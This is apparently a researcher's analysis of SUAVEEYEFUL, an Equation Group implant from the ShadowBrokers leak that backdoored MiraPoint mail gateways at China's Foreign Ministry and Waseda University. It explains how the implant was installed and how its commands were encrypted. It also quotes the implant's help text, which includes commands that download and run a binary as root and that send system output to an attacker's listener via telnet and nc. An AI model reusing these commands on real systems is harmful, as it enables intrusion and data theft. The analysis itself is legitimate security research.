I was checking the 2017 ShadowBrokers leaks when I noticed that one of the EQUATION GROUP tools leaked back then has no public references/analysis (at least as far as I can tell). So, here is what this software implant does and how it works. This was in a directory titled suaveeyeful_i386-unknown-mirapoint3.4.3 and it reveals lots of interesting details. In summary:
The Leaked Files
In that directory there are a few different files. Those are:
The utilities (bdes, decode-base64 and uriescape) were bundled along with SUAVEEYEFUL because they are internally used. This ensured that the software implant would not rely on any external dependencies (other than default, at the time, core system utilities like ls, cat, telnet, etc.)
Targets
The se.old client was potentially the one the operators were adapting for their new target. That is due to inconsistencies in its content which make it look like a draft/edited version of an old operation. A leftover comment identifies the mail.mfa.gov.cn (202.99.26.6) as its configured SUAVEEYEFUL target.
This was the email gateway of the Chinese Ministry of Foreign Affairs (MFA). Even to today, this IP address (202.99.26.6) still points to an email server from China’s MFA. It’s hard to determine when the EQUATION GROUP compromised this email server using the SUAVEEYEFUL software implant. Based entirely on the build times, we can assess that it was at least since the early 2000s.
Most of the files included in the leaked directory were designed for another target. The email gateways of the Waseda Research University, which according to its official website, “strives to conduct cutting-edge research that solves world problems and contributes to the greater good of society. Unorthodox thinking and intellectual curiosity are what drive research at Waseda.”
The se client had two compromised Waseda email gateways configured, and both accessed via their internal IP addresses from another compromised host, referenced only by its IP address. So, at least 3 systems in Waseda’s infrastructure were compromised by the EQUATION GROUP since at least 2003.
The top host (mp450) was the university’s MiraPoint 450 (later renamed to RazorGate 450), an email security appliance. And the other host (mg1.waseda.ac.jp) was the MiraPoint email gateway. The third host is still unknown, but based on its IP range (similar to that of mp450) we can deduce that it was likely a system located in the university’s DMZ network segment.
Installation of SUAVEEYEFUL in Waseda’s MiraPoint Servers
This is clearly described in the opscript.se file which we can assume that it was one of the first operational tasks that the EQUATION GROUP operators executed to install the SUAVEEYEFUL software implant. Here is that process:
The SUAVEEYEFUL Software Implant
The SUAVEEYEFUL (or SE) has two components, the client and the server. The server component is a very simple CGI program written in C for FreeBSD, and looking for input at its help endpoint. Any commands received would be executed (with root privileges as shown in the previous section) using the system() library call, as long as they match the defined format (described later in this post).
The client side ensures that all requests are properly requested, encoded (using Base64) and encrypted (with DES). The client supported 4 options:
As we can see from this, for the generation of the cryptographic material, EQUATION GROUP was using the system’s /dev/random in the following way:
head -c 8 /dev/random | hexdump -e '/8 \"0x%016x\n\"'
The command was then structured with # being used as a separator. The main command to be executed was constructed with this:
echo "`head -c 8 /dev/random | hexdump -e '/8 "%016x\n"'`#`date +"%s"`#$cmd"|bdes -k $key > out
Which results into a format that looks like that:
This structure was then encrypted using the hardcoded DES key, and passed through uriescape tool to ensure that there will be no parsing issues by the receiving MiraPoint web server.
Apart from the above, the client also used the date +”%N” command to get the date in nanoseconds and encrypt it with a key matching the same value. This was an anti-analysis/anti-detection trick since it would be hard for anyone to get the SE software implant to execute any command without this non-intuitive addition to its expected input.
Lastly, the SE help message displayed three instructions on example commands that the operator could use. The three help commands were performing the following tasks:
Here is the full help message:
1) se -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/curl http://10.1.2.150:5555/sendmail -osendmail;chmod +x sendmail;D=-c10.1.2.150:9999 PATH=. /usr/bin/asroot sendmail;rm -f sendmail) > /dev/null 2>&1" -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help"
2) se -c"(w; ls -l; ls -l /tmp) | bdes -k SECRET | mmencode | telnet 10.1.2.150 4444" -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help"
with nc -l -p 4444 | decode-base64 | bdes -d -k SECRET
Use this to generate a random key and replace SECRET with the key
head -c 8 /dev/random | hexdump -e '/8 "0x%016x\n"'
3) se -c"(w; ls -l; ls -l /tmp) | telnet 10.1.2.150 4444" -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help"
with nc -l -p 4444
WARNING
WARNING
DO NOT -burn!!!
Use -exit